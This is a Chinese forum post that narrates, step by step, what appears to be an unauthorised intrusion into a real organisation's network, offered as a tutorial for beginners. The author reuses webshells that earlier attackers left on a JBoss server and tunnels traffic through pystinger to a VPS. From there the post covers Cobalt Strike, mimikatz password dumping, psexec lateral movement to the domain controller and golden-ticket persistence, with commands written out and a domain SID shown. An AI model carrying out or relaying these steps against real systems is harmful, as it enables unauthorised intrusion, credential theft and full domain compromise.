电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1210 人浏览分享

jboss内网渗透并拿下域控

[复制链接]
1210 0
本帖最后由 zhaorong 于 2022-12-12 15:31 编辑

世界杯开赛快结束了,刚好搞的是强队的域控,好的竟然爆冷了,那今来给大伙展示展示厨艺[狗头]

web打点

朴实无华的jboss登录界面

QQ截图20221212142045.png

实在不好意思兄弟们,奈何关键的位置比较明显,就还是打一下码

QQ截图20221212142121.png

直接net user /domain,看到这个在本地xxx域的域控制器上处理请求,好家伙是存在域的

8889.png

ipconfig /all 再次认证了是存在域控的,是有一个网卡的,DNS服务器显示8.8.8.8,也就说明了不是域内主机。

8888.png

不出网的,需要搞个隧道代理,把流量转发到vps上

8886.png

利用这款工具的文件功能,先翻一下文件看看有什么信息,这里看到是有安装了google 之后可以读取
一下他的浏览器密码

8885.png

已经看到上传了很多war,全都是上传马子的,耶!是前辈的足迹,观摩了下前辈们的jsp木马 只能
说tql(直接下载回去学习一下)

8884.png

也有看到一些比较容易看懂的jsp木马,就直接通过前辈们留下的jsp进去

8883.png

冰歇连接进去

8882.png

内网探测和HTTP隧道代理

pystinger

这里使用pystinger,进行正向代理,通过webshell上传,实现Socks4a与cs联动,上线内网不出网主机

github:Release 优化多连接时传输速度 · FunnyWolf/pystinger · GitHub

8881.png

上传webshell里面的jsp到,jboss的根目录,也就是前辈们的war包里面

8880.png

这里就是把proxy.jsp改为类似前辈的jsp命名

2226.png

访问war的目录,看到这个就说明stinger的jsp上传成功

2216.png

然后再到其他比较隐蔽的文件夹,上传stinger_server.exe

2215.png

start stinger_server.exe 0.0.0.0,开启服务,视作为服务器

2198.png

vps需要开启stinger_client客户端服务,./stinger_client -w http://xxx.xxx.xxx.xxx/xx
x.jsp -l 0.0.0.0 -p 60000

2196.png

启动cs,设置windows的exe可执行程序,设置监听器为内网地址172.17.50.9,端口是60020

2189.png

2188.png

将生成的exe通过webshell上传并运行,等待cs的上线

2186.png

使用mimikatz模块,读取一下密码(这里一开始只抓到hash值,后面拿到域控写这篇文章后,就可以抓到明文密码了)

2183.png

这里想探测一下内网的域信息,但是跟webshell一样

2182.png

提权这里,使用的是cs自带的提权

2181.png

横向移动

那就扫描一下172.17.50.0这个网段,通过获取到的hash进行横向移动,跳转到其他内网主机

portscan 172.17.50.0/24 1-1024,3389,5000-6000 arp 1024

2180.png

扫描出来的结果发现有台主机名叫SRV-AD,蛤,这一定就是传说中的AD,嗯不是,是DC。

害,太菜了,百度脑补一下。

AD:是指活动目录数据库,里面存放众多的网络对象

DC:存放AD的计算机被称为DC

AD本质是提供目录服务的组件、DC本质是个计算机 【感觉就是注重点不同,但就是表达同一种东西】

这里通过横向的psexec,跳转到这台SRV-AD上

200.png

这里的监听器选用smb,Session会话选择提权完的system权限

189.png

188.png

186.png

可以看到这里成功上线

183.png

进行内网的信息收集

net user /domain #查询域内用户

182.png

定位一下域控

ping 域控 #好家伙自己ping自己

181.png

抓取一下hash

180.png

那么域控拿下了,剩下的也就是一样的横向移动

继续横向其他的内网主机,横向到WEBSERVICE

169.png

168.png

这里直接注入有域账号mysql里面的进程,并上线成功

166.png

用同样的办法上线,其他内网主机里面

139.png

权限维持

制作黄金票据,黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。

138.png

需要域用户名+域+域SID+krbtgt的hash

136.png

域SID,S-1-5-21-3225502217-588435446-3680153074-1150去掉后面的-1150

133.png

hash

QQ截图20221212152322.png

票据制作成功

888888888888888.png

shell klist #查看票据

3333333336.png

shell dir \\WEBSERVICE\C$ #但是我这里访问被拒绝了

882519.png

另外一台是可以访问的

2600.png

这里就结束啦,文章是比较适合小白新手学习。


苦练,做任何事情都一样,成功没有捷径可走,想要一步登天的人,只会飞的越高,摔得越惨。

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.